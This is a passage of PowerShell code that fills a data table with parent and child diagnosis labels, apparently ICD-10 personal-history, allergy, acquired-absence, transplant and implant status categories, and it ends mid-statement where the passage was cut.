$null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of lip, oral cavity, and pharynx","Personal history of malignant neoplasm of tongue") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of lip, oral cavity, and pharynx","Personal history of malignant neoplasm of other sites of lip, oral cavity, and pharynx") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of lip, oral cavity, and pharynx","Personal history of malignant neoplasm of unspecified site of lip, oral cavity, and pharynx") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of skin","Personal history of malignant melanoma of skin") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of skin","Personal history of Merkel cell carcinoma") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of skin","Personal history of other malignant neoplasm of skin") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of bone and soft tissue","Personal history of malignant neoplasm of bone") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of bone and soft tissue","Personal history of malignant neoplasm of soft tissue") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of eye and nervous tissue","Personal history of malignant neoplasm of eye") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of eye and nervous tissue","Personal history of malignant neoplasm of brain") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of eye and nervous tissue","Personal history of malignant neoplasm of other parts of nervous tissue") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of endocrine glands","Personal history of malignant neoplasm of thyroid") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of endocrine glands","Personal history of malignant neoplasm of other endocrine glands") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm of other organs and systems","Personal history of malignant neoplasm of other organs and systems") + $null = $DiagnosisList.Rows.Add("Personal history of malignant neoplasm, unspecified","Personal history of malignant neoplasm, unspecified") + $null = $DiagnosisList.Rows.Add("Personal history of in-situ neoplasm","Personal history of in-situ neoplasm of breast") + $null = $DiagnosisList.Rows.Add("Personal history of in-situ neoplasm","Personal history of in-situ neoplasm of cervix uteri") + $null = $DiagnosisList.Rows.Add("Personal history of in-situ neoplasm","Personal history of in-situ neoplasm of other site") + $null = $DiagnosisList.Rows.Add("Personal history of benign neoplasm","Personal history of colonic polyps") + $null = $DiagnosisList.Rows.Add("Personal history of benign neoplasm","Personal history of benign neoplasm of the brain") + $null = $DiagnosisList.Rows.Add("Personal history of benign neoplasm","Personal history of benign carcinoid tumor") + $null = $DiagnosisList.Rows.Add("Personal history of benign neoplasm","Personal history of other benign neoplasm") + $null = $DiagnosisList.Rows.Add("Personal history of neoplasm of uncertain behavior","Personal history of neoplasm of uncertain behavior") + $null = $DiagnosisList.Rows.Add("Personal history of infectious and parasitic diseases","Personal history of tuberculosis") + $null = $DiagnosisList.Rows.Add("Personal history of infectious and parasitic diseases","Personal history of poliomyelitis") + $null = $DiagnosisList.Rows.Add("Personal history of infectious and parasitic diseases","Personal history of malaria") + $null = $DiagnosisList.Rows.Add("Personal history of infectious and parasitic diseases","Personal history of Methicillin resistant Staphylococcus aureus infection") + $null = $DiagnosisList.Rows.Add("Personal history of infectious and parasitic diseases","Personal history of other infectious and parasitic diseases") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism","Personal history of diseases of the blood and blood-forming organs and certain disorders involving the immune mechanism") + $null = $DiagnosisList.Rows.Add("Personal history of endocrine, nutritional and metabolic diseases","Personal history of diabetic foot ulcer") + $null = $DiagnosisList.Rows.Add("Personal history of endocrine, nutritional and metabolic diseases","Personal history of gestational diabetes") + $null = $DiagnosisList.Rows.Add("Personal history of endocrine, nutritional and metabolic diseases","Personal history of other endocrine, nutritional and metabolic disease") + $null = $DiagnosisList.Rows.Add("Personal history of mental and behavioral disorders","Personal history of combat and operational stress reaction") + $null = $DiagnosisList.Rows.Add("Personal history of mental and behavioral disorders","Personal history of other mental and behavioral disorders") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the nervous system and sense organs","Personal history of infections of the central nervous system") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the nervous system and sense organs","Personal history of other diseases of the nervous system and sense organs") + $null = $DiagnosisList.Rows.Add("Personal history of venous thrombosis and embolism","Personal history of pulmonary embolism") + $null = $DiagnosisList.Rows.Add("Personal history of venous thrombosis and embolism","Personal history of other venous thrombosis and embolism") + $null = $DiagnosisList.Rows.Add("Personal history of thrombophlebitis","Personal history of thrombophlebitis") + $null = $DiagnosisList.Rows.Add("Personal history of transient ischemic attack (TIA), and cerebral infarction without residual deficits","Personal history of transient ischemic attack (TIA), and cerebral infarction without residual deficits") + $null = $DiagnosisList.Rows.Add("Personal history of sudden cardiac arrest","Personal history of sudden cardiac arrest") + $null = $DiagnosisList.Rows.Add("Personal history of other diseases of the circulatory system","Personal history of other diseases of the circulatory system") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the respiratory system","Personal history of pneumonia (recurrent)") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the respiratory system","Personal history of other diseases of the respiratory system") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the digestive system","Personal history of peptic ulcer disease") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the digestive system","Personal history of other diseases of the digestive system") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of the skin and subcutaneous tissue","Personal history of diseases of the skin and subcutaneous tissue") + $null = $DiagnosisList.Rows.Add("Personal history of (healed) nontraumatic fracture","Personal history of (healed) osteoporosis fracture") + $null = $DiagnosisList.Rows.Add("Personal history of (healed) nontraumatic fracture","Personal history of (healed) other pathological fracture") + $null = $DiagnosisList.Rows.Add("Personal history of (healed) nontraumatic fracture","Personal history of (healed) stress fracture") + $null = $DiagnosisList.Rows.Add("Personal history of other diseases of the musculoskeletal system and connective tissue","Personal history of other diseases of the musculoskeletal system and connective tissue") + $null = $DiagnosisList.Rows.Add("Personal history of dysplasia of the female genital tract","Personal history of cervical dysplasia") + $null = $DiagnosisList.Rows.Add("Personal history of dysplasia of the female genital tract","Personal history of vaginal dysplasia") + $null = $DiagnosisList.Rows.Add("Personal history of dysplasia of the female genital tract","Personal history of vulvar dysplasia") + $null = $DiagnosisList.Rows.Add("Personal history of other diseases of the female genital tract","Personal history of other diseases of the female genital tract") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of male genital organs","Personal history of prostatic dysplasia") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of male genital organs","Personal history of other diseases of male genital organs") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of urinary system","Personal history of urinary (tract) infections") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of urinary system","Personal history of nephrotic syndrome") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of urinary system","Personal history of urinary calculi") + $null = $DiagnosisList.Rows.Add("Personal history of diseases of urinary system","Personal history of other diseases of urinary system") + $null = $DiagnosisList.Rows.Add("Personal history of complications of pregnancy, childbirth and the puerperium","Personal history of pre-term labor") + $null = $DiagnosisList.Rows.Add("Personal history of complications of pregnancy, childbirth and the puerperium","Personal history of other complications of pregnancy, childbirth and the puerperium") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of genitourinary system","Personal history of (corrected) hypospadias") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of genitourinary system","Personal history of other specified (corrected) congenital malformations of genitourinary system") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of nervous system and sense organs","Personal history of (corrected) congenital malformations of eye") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of nervous system and sense organs","Personal history of (corrected) congenital malformations of ear") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of nervous system and sense organs","Personal history of other specified (corrected) congenital malformations of nervous system and sense organs") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of digestive system","Personal history of (corrected) cleft lip and palate") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of digestive system","Personal history of other specified (corrected) congenital malformations of digestive system") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of heart and circulatory system","Personal history of (corrected) congenital malformations of heart and circulatory system") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of respiratory system","Personal history of (corrected) congenital malformations of respiratory system") + $null = $DiagnosisList.Rows.Add("Personal history of (corrected) congenital malformations of integument, limbs and musculoskeletal system","Personal history of (corrected) congenital malformations of integument, limbs and musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Personal history of other (corrected) congenital malformations","Personal history of (corrected) congenital malformations of face and neck") + $null = $DiagnosisList.Rows.Add("Personal history of other (corrected) congenital malformations","Personal history of other (corrected) congenital malformations") + $null = $DiagnosisList.Rows.Add("Personal history of other specified conditions","Personal history of (healed) traumatic fracture") + $null = $DiagnosisList.Rows.Add("Personal history of other (healed) physical injury and trauma","Personal history of traumatic brain injury") + $null = $DiagnosisList.Rows.Add("Personal history of other (healed) physical injury and trauma","Personal history of retained foreign body fully removed") + $null = $DiagnosisList.Rows.Add("Personal history of other (healed) physical injury and trauma","Personal history of other (healed) physical injury and trauma") + $null = $DiagnosisList.Rows.Add("Personal history of other specified conditions","Personal history of sex reassignment") + $null = $DiagnosisList.Rows.Add("Personal history of other specified conditions","Personal history of nicotine dependence") + $null = $DiagnosisList.Rows.Add("Personal history of other specified conditions","Personal history of anaphylaxis") + $null = $DiagnosisList.Rows.Add("Personal history of other specified conditions","Personal history of other specified conditions") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to penicillin") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to other antibiotic agents status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to sulfonamides status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to other anti-infective agents status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to anesthetic agent status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to narcotic agent status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to analgesic agent status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to serum and vaccine status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to other drugs, medicaments and biological substances status") + $null = $DiagnosisList.Rows.Add("Allergy status to drugs, medicaments and biological substances","Allergy status to unspecified drugs, medicaments and biological substances status") + $null = $DiagnosisList.Rows.Add("Acquired absence of thumb","Acquired absence of right thumb") + $null = $DiagnosisList.Rows.Add("Acquired absence of thumb","Acquired absence of left thumb") + $null = $DiagnosisList.Rows.Add("Acquired absence of thumb","Acquired absence of unspecified thumb") + $null = $DiagnosisList.Rows.Add("Acquired absence of other finger(s)","Acquired absence of right finger(s)") + $null = $DiagnosisList.Rows.Add("Acquired absence of other finger(s)","Acquired absence of left finger(s)") + $null = $DiagnosisList.Rows.Add("Acquired absence of other finger(s)","Acquired absence of unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Acquired absence of hand","Acquired absence of right hand") + $null = $DiagnosisList.Rows.Add("Acquired absence of hand","Acquired absence of left hand") + $null = $DiagnosisList.Rows.Add("Acquired absence of hand","Acquired absence of unspecified hand") + $null = $DiagnosisList.Rows.Add("Acquired absence of wrist","Acquired absence of right wrist") + $null = $DiagnosisList.Rows.Add("Acquired absence of wrist","Acquired absence of left wrist") + $null = $DiagnosisList.Rows.Add("Acquired absence of wrist","Acquired absence of unspecified wrist") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb, unspecified level","Acquired absence of right upper limb, unspecified level") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb, unspecified level","Acquired absence of left upper limb, unspecified level") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb, unspecified level","Acquired absence of unspecified upper limb, unspecified level") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb below elbow","Acquired absence of right upper limb below elbow") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb below elbow","Acquired absence of left upper limb below elbow") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb below elbow","Acquired absence of unspecified upper limb below elbow") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb above elbow","Acquired absence of right upper limb above elbow") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb above elbow","Acquired absence of left upper limb above elbow") + $null = $DiagnosisList.Rows.Add("Acquired absence of upper limb above elbow","Acquired absence of unspecified upper limb above elbow") + $null = $DiagnosisList.Rows.Add("Acquired absence of shoulder","Acquired absence of right shoulder") + $null = $DiagnosisList.Rows.Add("Acquired absence of shoulder","Acquired absence of left shoulder") + $null = $DiagnosisList.Rows.Add("Acquired absence of shoulder","Acquired absence of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Acquired absence of great toe","Acquired absence of right great toe") + $null = $DiagnosisList.Rows.Add("Acquired absence of great toe","Acquired absence of left great toe") + $null = $DiagnosisList.Rows.Add("Acquired absence of great toe","Acquired absence of unspecified great toe") + $null = $DiagnosisList.Rows.Add("Acquired absence of other toe(s)","Acquired absence of other right toe(s)") + $null = $DiagnosisList.Rows.Add("Acquired absence of other toe(s)","Acquired absence of other left toe(s)") + $null = $DiagnosisList.Rows.Add("Acquired absence of other toe(s)","Acquired absence of other toe(s), unspecified side") + $null = $DiagnosisList.Rows.Add("Acquired absence of foot","Acquired absence of right foot") + $null = $DiagnosisList.Rows.Add("Acquired absence of foot","Acquired absence of left foot") + $null = $DiagnosisList.Rows.Add("Acquired absence of foot","Acquired absence of unspecified foot") + $null = $DiagnosisList.Rows.Add("Acquired absence of ankle","Acquired absence of right ankle") + $null = $DiagnosisList.Rows.Add("Acquired absence of ankle","Acquired absence of left ankle") + $null = $DiagnosisList.Rows.Add("Acquired absence of ankle","Acquired absence of unspecified ankle") + $null = $DiagnosisList.Rows.Add("Acquired absence of leg below knee","Acquired absence of right leg below knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of leg below knee","Acquired absence of left leg below knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of leg below knee","Acquired absence of unspecified leg below knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of knee","Acquired absence of right knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of knee","Acquired absence of left knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of knee","Acquired absence of unspecified knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of leg above knee","Acquired absence of right leg above knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of leg above knee","Acquired absence of left leg above knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of leg above knee","Acquired absence of unspecified leg above knee") + $null = $DiagnosisList.Rows.Add("Acquired absence of hip","Acquired absence of right hip joint") + $null = $DiagnosisList.Rows.Add("Acquired absence of hip","Acquired absence of left hip joint") + $null = $DiagnosisList.Rows.Add("Acquired absence of hip","Acquired absence of unspecified hip joint") + $null = $DiagnosisList.Rows.Add("Acquired absence of limb, unspecified","Acquired absence of limb, unspecified") + $null = $DiagnosisList.Rows.Add("Acquired absence of part of head and neck","Acquired absence of eye") + $null = $DiagnosisList.Rows.Add("Acquired absence of part of head and neck","Acquired absence of larynx") + $null = $DiagnosisList.Rows.Add("Acquired absence of part of head and neck","Acquired absence of other part of head and neck") + $null = $DiagnosisList.Rows.Add("Acquired absence of breast and nipple","Acquired absence of unspecified breast and nipple") + $null = $DiagnosisList.Rows.Add("Acquired absence of breast and nipple","Acquired absence of right breast and nipple") + $null = $DiagnosisList.Rows.Add("Acquired absence of breast and nipple","Acquired absence of left breast and nipple") + $null = $DiagnosisList.Rows.Add("Acquired absence of breast and nipple","Acquired absence of bilateral breasts and nipples") + $null = $DiagnosisList.Rows.Add("Acquired absence of lung [part of]","Acquired absence of lung [part of]") + $null = $DiagnosisList.Rows.Add("Acquired absence of stomach [part of]","Acquired absence of stomach [part of]") + $null = $DiagnosisList.Rows.Add("Acquired absence of pancreas","Acquired total absence of pancreas") + $null = $DiagnosisList.Rows.Add("Acquired absence of pancreas","Acquired partial absence of pancreas") + $null = $DiagnosisList.Rows.Add("Acquired absence of other specified parts of digestive tract","Acquired absence of other specified parts of digestive tract") + $null = $DiagnosisList.Rows.Add("Acquired absence of kidney","Acquired absence of kidney") + $null = $DiagnosisList.Rows.Add("Acquired absence of other parts of urinary tract","Acquired absence of other parts of urinary tract") + $null = $DiagnosisList.Rows.Add("Acquired absence of cervix and uterus","Acquired absence of both cervix and uterus") + $null = $DiagnosisList.Rows.Add("Acquired absence of cervix and uterus","Acquired absence of uterus with remaining cervical stump") + $null = $DiagnosisList.Rows.Add("Acquired absence of cervix and uterus","Acquired absence of cervix with remaining uterus") + $null = $DiagnosisList.Rows.Add("Acquired absence of ovaries","Acquired absence of ovaries, unilateral") + $null = $DiagnosisList.Rows.Add("Acquired absence of ovaries","Acquired absence of ovaries, bilateral") + $null = $DiagnosisList.Rows.Add("Acquired absence of other genital organ(s)","Acquired absence of other genital organ(s)") + $null = $DiagnosisList.Rows.Add("Acquired absence of other organs","Acquired absence of spleen") + $null = $DiagnosisList.Rows.Add("Acquired absence of other organs","Acquired absence of other organs") + $null = $DiagnosisList.Rows.Add("Food allergy status","Allergy to peanuts") + $null = $DiagnosisList.Rows.Add("Food allergy status","Allergy to milk products") + $null = $DiagnosisList.Rows.Add("Food allergy status","Allergy to eggs") + $null = $DiagnosisList.Rows.Add("Food allergy status","Allergy to seafood") + $null = $DiagnosisList.Rows.Add("Food allergy status","Allergy to other foods") + $null = $DiagnosisList.Rows.Add("Food additives allergy status","Food additives allergy status") + $null = $DiagnosisList.Rows.Add("Insect allergy status","Bee allergy status") + $null = $DiagnosisList.Rows.Add("Insect allergy status","Other insect allergy status") + $null = $DiagnosisList.Rows.Add("Nonmedicinal substance allergy status","Latex allergy status") + $null = $DiagnosisList.Rows.Add("Nonmedicinal substance allergy status","Radiographic dye allergy status") + $null = $DiagnosisList.Rows.Add("Nonmedicinal substance allergy status","Other nonmedicinal substance allergy status") + $null = $DiagnosisList.Rows.Add("Other allergy status, other than to drugs and biological substances","Other allergy status, other than to drugs and biological substances") + $null = $DiagnosisList.Rows.Add("Patient's noncompliance with medical treatment and regimen","Patient's noncompliance with dietary regimen") + $null = $DiagnosisList.Rows.Add("Patient's intentional underdosing of medication regimen","Patient's intentional underdosing of medication regimen due to financial hardship") + $null = $DiagnosisList.Rows.Add("Patient's intentional underdosing of medication regimen","Patient's intentional underdosing of medication regimen for other reason") + $null = $DiagnosisList.Rows.Add("Patient's unintentional underdosing of medication regimen","Patient's unintentional underdosing of medication regimen due to age-related debility") + $null = $DiagnosisList.Rows.Add("Patient's unintentional underdosing of medication regimen","Patient's unintentional underdosing of medication regimen for other reason") + $null = $DiagnosisList.Rows.Add("Patient's other noncompliance with medication regimen","Patient's other noncompliance with medication regimen") + $null = $DiagnosisList.Rows.Add("Patient's noncompliance with renal dialysis","Patient's noncompliance with renal dialysis") + $null = $DiagnosisList.Rows.Add("Patient's noncompliance with other medical treatment and regimen","Patient's noncompliance with other medical treatment and regimen") + $null = $DiagnosisList.Rows.Add("Personal history of adult abuse","Personal history of adult physical and sexual abuse") + $null = $DiagnosisList.Rows.Add("Personal history of adult abuse","Personal history of adult psychological abuse") + $null = $DiagnosisList.Rows.Add("Personal history of adult abuse","Personal history of adult neglect") + $null = $DiagnosisList.Rows.Add("Personal history of adult abuse","Personal history of unspecified adult abuse") + $null = $DiagnosisList.Rows.Add("Other personal history of psychological trauma, not elsewhere classified","Other personal history of psychological trauma, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Personal history of self-harm","Personal history of self-harm") + $null = $DiagnosisList.Rows.Add("Other specified personal risk factors, not elsewhere classified","History of falling") + $null = $DiagnosisList.Rows.Add("Other specified personal risk factors, not elsewhere classified","Personal history of military deployment") + $null = $DiagnosisList.Rows.Add("Other specified personal risk factors, not elsewhere classified","Wandering in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Oral health risk factors","Risk for dental caries, low") + $null = $DiagnosisList.Rows.Add("Oral health risk factors","Risk for dental caries, moderate") + $null = $DiagnosisList.Rows.Add("Oral health risk factors","Risk for dental caries, high") + $null = $DiagnosisList.Rows.Add("Oral health risk factors","Unspecified risk for dental caries") + $null = $DiagnosisList.Rows.Add("Other specified personal risk factors, not elsewhere classified","Other specified personal risk factors, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Personal history of medical treatment","Personal history of contraception") + $null = $DiagnosisList.Rows.Add("Personal history of drug therapy","Personal history of antineoplastic chemotherapy") + $null = $DiagnosisList.Rows.Add("Personal history of drug therapy","Personal history of monoclonal drug therapy") + $null = $DiagnosisList.Rows.Add("Personal history of drug therapy","Personal history of estrogen therapy") + $null = $DiagnosisList.Rows.Add("Personal history of steroid therapy","Personal history of inhaled steroid therapy") + $null = $DiagnosisList.Rows.Add("Personal history of steroid therapy","Personal history of systemic steroid therapy") + $null = $DiagnosisList.Rows.Add("Personal history of immunosupression therapy","Personal history of immunosupression therapy") + $null = $DiagnosisList.Rows.Add("Personal history of other drug therapy","Personal history of other drug therapy") + $null = $DiagnosisList.Rows.Add("Personal history of irradiation","Personal history of irradiation") + $null = $DiagnosisList.Rows.Add("Personal history of other medical treatment","Personal history of extracorporeal membrane oxygenation (ECMO)") + $null = $DiagnosisList.Rows.Add("Personal history of other medical treatment","Status post administration of tPA (rtPA) in a different facility within the last 24 hours prior to admission to current facility") + $null = $DiagnosisList.Rows.Add("Personal history of other medical treatment","Personal history of failed moderate sedation") + $null = $DiagnosisList.Rows.Add("Personal history of other medical treatment","Personal history of unintended awareness under general anesthesia") + $null = $DiagnosisList.Rows.Add("Personal history of other medical treatment","Personal history of other medical treatment") + $null = $DiagnosisList.Rows.Add("Artificial opening status","Tracheostomy status") + $null = $DiagnosisList.Rows.Add("Artificial opening status","Gastrostomy status") + $null = $DiagnosisList.Rows.Add("Artificial opening status","Ileostomy status") + $null = $DiagnosisList.Rows.Add("Artificial opening status","Colostomy status") + $null = $DiagnosisList.Rows.Add("Artificial opening status","Other artificial openings of gastrointestinal tract status") + $null = $DiagnosisList.Rows.Add("Cystostomy status","Unspecified cystostomy status") + $null = $DiagnosisList.Rows.Add("Cystostomy status","Cutaneous-vesicostomy status") + $null = $DiagnosisList.Rows.Add("Cystostomy status","Appendico-vesicostomy status") + $null = $DiagnosisList.Rows.Add("Cystostomy status","Other cystostomy status") + $null = $DiagnosisList.Rows.Add("Other artificial openings of urinary tract status","Other artificial openings of urinary tract status") + $null = $DiagnosisList.Rows.Add("Other artificial opening status","Other artificial opening status") + $null = $DiagnosisList.Rows.Add("Artificial opening status, unspecified","Artificial opening status, unspecified") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Kidney transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Heart transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Lung transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Heart and lungs transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Liver transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Skin transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Bone transplant status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status","Corneal transplant status") + $null = $DiagnosisList.Rows.Add("Other transplanted organ and tissue status","Bone marrow transplant status") + $null = $DiagnosisList.Rows.Add("Other transplanted organ and tissue status","Intestine transplant status") + $null = $DiagnosisList.Rows.Add("Other transplanted organ and tissue status","Pancreas transplant status") + $null = $DiagnosisList.Rows.Add("Other transplanted organ and tissue status","Stem cells transplant status") + $null = $DiagnosisList.Rows.Add("Other transplanted organ and tissue status","Other transplanted organ and tissue status") + $null = $DiagnosisList.Rows.Add("Transplanted organ and tissue status, unspecified","Transplanted organ and tissue status, unspecified") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implants and grafts","Presence of cardiac pacemaker") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implants and grafts","Presence of aortocoronary bypass graft") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implants and grafts","Presence of prosthetic heart valve") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implants and grafts","Presence of xenogenic heart valve") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implants and grafts","Presence of other heart-valve replacement") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implants and grafts","Presence of coronary angioplasty implant and graft") + $null = $DiagnosisList.Rows.Add("Presence of other cardiac implants and grafts","Presence of automatic (implantable) cardiac defibrillator") + $null = $DiagnosisList.Rows.Add("Presence of other cardiac implants and grafts","Presence of heart assist device") + $null = $DiagnosisList.Rows.Add("Presence of other cardiac implants and grafts","Presence of fully implantable artificial heart") + $null = $DiagnosisList.Rows.Add("Presence of other cardiac implants and grafts","Presence of other cardiac implants and grafts") + $null = $DiagnosisList.Rows.Add("Presence of other vascular implants and grafts","Peripheral vascular angioplasty status with implants and grafts") + $null = $DiagnosisList.Rows.Add("Presence of other vascular implants and grafts","Presence of other vascular implants and grafts") + $null = $DiagnosisList.Rows.Add("Presence of cardiac and vascular implant and graft, unspecified","Presence of cardiac and vascular implant and graft, unspecified") + $null = $DiagnosisList.Rows.Add("Presence of other functional implants","Presence of urogenital implants") + $null = $DiagnosisList.Rows.Add("Presence of other functional implants","Presence of intraocular lens") + $null = $DiagnosisList.Rows.Add("Presence of otological and audiological implants","Presence of otological and audiological implant, unspecified") + $null = $DiagnosisList.Rows.Add("Presence of otological and audiological implants","Cochlear implant status") + $null = $DiagnosisList.Rows.Add("Presence of otological and audiological implants","Myringotomy tube(s) status") + $null = $DiagnosisList.Rows.Add("Presence of otological and audiological implants","Presence of other otological and audiological implants") + $null = $DiagnosisList.Rows.Add("Presence of artificial larynx","Presence of artificial larynx") + $null = $DiagnosisList.Rows.Add("Presence of endocrine implants","Presence of insulin pump (external) (internal)") + $null = $DiagnosisList.Rows.Add("Presence of endocrine implants","Presence of other endocrine implants") + $null = $DiagnosisList.Rows.Add("Presence of tooth-root and mandibular implants","Presence of tooth-root and mandibular implants") + $null = $DiagnosisList.Rows.Add("Presence of orthopedic joint implants","Presence of unspecified orthopedic joint implant") + $null = $DiagnosisList.Rows.Add("Presence of artificial shoulder joint","Presence of right artificial shoulder joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial shoulder joint","Presence of left artificial shoulder joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial shoulder joint","Presence of unspecified artificial shoulder joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial elbow joint","Presence of right artificial elbow joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial elbow joint","Presence of left artificial elbow joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial elbow joint","Presence of unspecified artificial elbow joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial wrist joint","Presence of right artificial wrist joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial wrist joint","Presence of left artificial wrist joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial wrist joint","Presence of unspecified artificial wrist joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial hip joint","Presence of right artificial hip joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial hip joint","Presence of left artificial hip joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial hip joint","Presence of artificial hip joint, bilateral") + $null = $DiagnosisList.Rows.Add("Presence of artificial hip joint","Presence of unspecified artificial hip joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial knee joint","Presence of right artificial knee joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial knee joint","Presence of left artificial knee joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial knee joint","Presence of artificial knee joint, bilateral") + $null = $DiagnosisList.Rows.Add("Presence of artificial knee joint","Presence of unspecified artificial knee joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial ankle joint","Presence of right artificial ankle joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial ankle joint","Presence of left artificial ankle joint") + $null = $DiagnosisList.Rows.Add("Presence of artificial ankle joint","Presence of unspecified artificial ankle joint") + $null = $DiagnosisList.Rows.Add("Presence of other orthopedic joint implants","Finger-joint replacement of right hand") + $null = $DiagnosisList.Rows.Add("Presence of other orthopedic joint implants","Finger-joint replacement of left hand") + $null = $DiagnosisList.Rows.Add("Presence of other orthopedic joint implants","Finger-joint replacement, bilateral") + $null = $DiagnosisList.Rows.Add("Presence of other orthopedic joint implants","Presence of other orthopedic joint implants") + $null = $DiagnosisList.Rows.Add("Presence of other bone and tendon implants","Presence of other bone and tendon implants") + $null = $DiagnosisList.Rows.Add("Presence of other specified functional implants","Presence of artificial skin") + $null = $DiagnosisList.Rows.Add("Presence of other specified functional implants","Presence of other specified functional implants") + $null = $DiagnosisList.Rows.Add("Presence of functional implant, unspecified","Presence of functional implant, unspecified") + $null = $DiagnosisList.Rows.Add("Presence of other devices","Presence of artificial eye") + $null = $DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial limb (complete) (partial), unspecified") + $null = $DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial right arm (complete) (partial)") + $null = $DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial left arm (complete) (partial)") + $null = $DiagnosisList.Rows.Add("Presence of artificial limb (complete) (partial)","Presence of artificial right leg (complete) (partial)") + $null = 